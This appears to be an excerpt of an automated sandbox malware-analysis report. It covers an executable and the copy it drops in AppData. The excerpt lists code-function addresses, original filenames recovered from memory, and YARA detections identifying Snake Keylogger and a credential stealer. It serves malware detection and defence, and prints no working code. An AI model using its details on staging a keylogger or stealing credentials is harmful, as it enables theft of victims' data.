            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A4518B8_2_06A4518B
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A411918_2_06A41191
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A451988_2_06A45198
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A485FB8_2_06A485FB
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A4C9C88_2_06A4C9C8
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A4BD288_2_06A4BD28
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A40D398_2_06A40D39
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A479008_2_06A47900
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A40D488_2_06A40D48
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A47D488_2_06A47D48
            Source: C:\Users\user\Desktop\hcy2SdW2z6.exeCode function: 8_2_06A47D588_2_06A47D58
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_050C44489_2_050C4448
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_050C44589_2_050C4458
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_050C24E49_2_050C24E4
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_0570E5909_2_0570E590
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_0570CEB89_2_0570CEB8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_0570E5809_2_0570E580
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_0570CE789_2_0570CE78
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_057030389_2_05703038
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_057013B49_2_057013B4
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_057013A59_2_057013A5
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B4FA2A9_2_07B4FA2A
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B417F09_2_07B417F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B417E09_2_07B417E0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B486D09_2_07B486D0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B456C89_2_07B456C8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B482989_2_07B48298
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B4A1B09_2_07B4A1B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B48B089_2_07B48B08
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B40B789_2_07B40B78
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B4AAE09_2_07B4AAE0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B41AE09_2_07B41AE0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B41AD09_2_07B41AD0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 9_2_07B41A789_2_07B41A78
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2F00713_2_00F2F007
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2610813_2_00F26108
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2B32813_2_00F2B328
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2C47013_2_00F2C470
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F297E813_2_00F297E8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2C75113_2_00F2C751
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2688013_2_00F26880
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F24AD913_2_00F24AD9
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2CA3113_2_00F2CA31
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2BBD313_2_00F2BBD3
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2BEB013_2_00F2BEB0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2B4F313_2_00F2B4F3
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2357013_2_00F23570
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2E52813_2_00F2E528
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_00F2E51713_2_00F2E517
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF846013_2_04EF8460
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF387013_2_04EF3870
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF004013_2_04EF0040
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF11C013_2_04EF11C0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF7D9013_2_04EF7D90
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFB4E813_2_04EFB4E8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE8F813_2_04EFE8F8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF08F013_2_04EF08F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFB4D713_2_04EFB4D7
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF04A013_2_04EF04A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE4A013_2_04EFE4A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE4B013_2_04EFE4B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF049013_2_04EF0490
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF386013_2_04EF3860
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE04913_2_04EFE049
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE05813_2_04EFE058
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFDC0013_2_04EFDC00
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF001E13_2_04EF001E
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF001413_2_04EF0014
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFC1E013_2_04EFC1E0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFC1F013_2_04EFC1F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFF1A913_2_04EFF1A9
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFF1B813_2_04EFF1B8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF11B013_2_04EF11B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFBD8813_2_04EFBD88
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFBD9813_2_04EFBD98
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF0D6013_2_04EF0D60
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFED6013_2_04EFED60
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFB94013_2_04EFB940
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF0D5113_2_04EF0D51
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFED5013_2_04EFED50
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFB93013_2_04EFB930
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFE90813_2_04EFE908
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF090013_2_04EF0900
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFCEEA13_2_04EFCEEA
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFCEF813_2_04EFCEF8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFCAA013_2_04EFCAA0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFFA6813_2_04EFFA68
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFC64813_2_04EFC648
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFFA5913_2_04EFFA59
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFC63813_2_04EFC638
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFF60013_2_04EFF600
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFF61013_2_04EFF610
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EF73E813_2_04EF73E8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFDBF113_2_04EFDBF1
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFD7A813_2_04EFD7A8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFD79813_2_04EFD798
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFD34013_2_04EFD340
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_04EFD35013_2_04EFD350
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BBD3813_2_054BBD38
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BC9D813_2_054BC9D8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B8C5113_2_054B8C51
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BA40813_2_054BA408
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BD02813_2_054BD028
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BB0A013_2_054BB0A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BC38813_2_054BC388
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BAA5813_2_054BAA58
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BD67013_2_054BD670
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B860813_2_054B8608
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BB6E813_2_054BB6E8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B0D4813_2_054B0D48
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B7D4813_2_054B7D48
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B7D5813_2_054B7D58
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B790013_2_054B7900
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BBD2813_2_054BBD28
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B0D3913_2_054B0D39
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BC9C813_2_054BC9C8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B85FC13_2_054B85FC
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B518A13_2_054B518A
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B519813_2_054B5198
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B119113_2_054B1191
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B11A013_2_054B11A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B81A013_2_054B81A0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B81B013_2_054B81B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B004013_2_054B0040
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B704013_2_054B7040
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B705013_2_054B7050
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B280913_2_054B2809
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B280713_2_054B2807
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B000613_2_054B0006
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BD01813_2_054BD018
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B443013_2_054B4430
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B08E013_2_054B08E0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B78F013_2_054B78F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B08F013_2_054B08F0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B048813_2_054B0488
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B049813_2_054B0498
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BB09013_2_054BB090
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B749713_2_054B7497
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B74A813_2_054B74A8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B28B013_2_054B28B0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B677813_2_054B6778
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BC37813_2_054BC378
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B631213_2_054B6312
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B632013_2_054B6320
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B373013_2_054B3730
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B6BC113_2_054B6BC1
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B6BD013_2_054B6BD0
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BA3F813_2_054BA3F8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B33A813_2_054B33A8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B33B813_2_054B33B8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BAA4813_2_054BAA48
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BD66213_2_054BD662
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B5A6013_2_054B5A60
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B5A7013_2_054B5A70
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B560A13_2_054B560A
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B561813_2_054B5618
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B5EC813_2_054B5EC8
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054BB6D913_2_054BB6D9
            Source: C:\Users\user\AppData\Roaming\zZlsXaceOG.exeCode function: 13_2_054B5EB813_2_054B5EB8
            Source: hcy2SdW2z6.exe, 00000000.00000002.1231896459.0000000001430000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1231393034.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1236876601.000000000475F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1240323842.0000000007C40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1239392482.000000000626D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEY2 vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1236876601.0000000004A10000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1236876601.0000000003F49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCaptive.dll" vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000000.1174114844.0000000000AB6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamehSyL.exeB vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000000.00000002.1232948903.0000000003110000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exe, 00000008.00000002.3639838847.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exeBinary or memory string: OriginalFilenamehSyL.exeB vs hcy2SdW2z6.exe
            Source: hcy2SdW2z6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 13.2.zZlsXaceOG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 13.2.zZlsXaceOG.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hcy2SdW2z6.exe.4a31688.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.zZlsXaceOG.exe.44f12f8.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 9.2.zZlsXaceOG.exe.4511d18.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 0.2.hcy2SdW2z6.exe.4a10c68.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
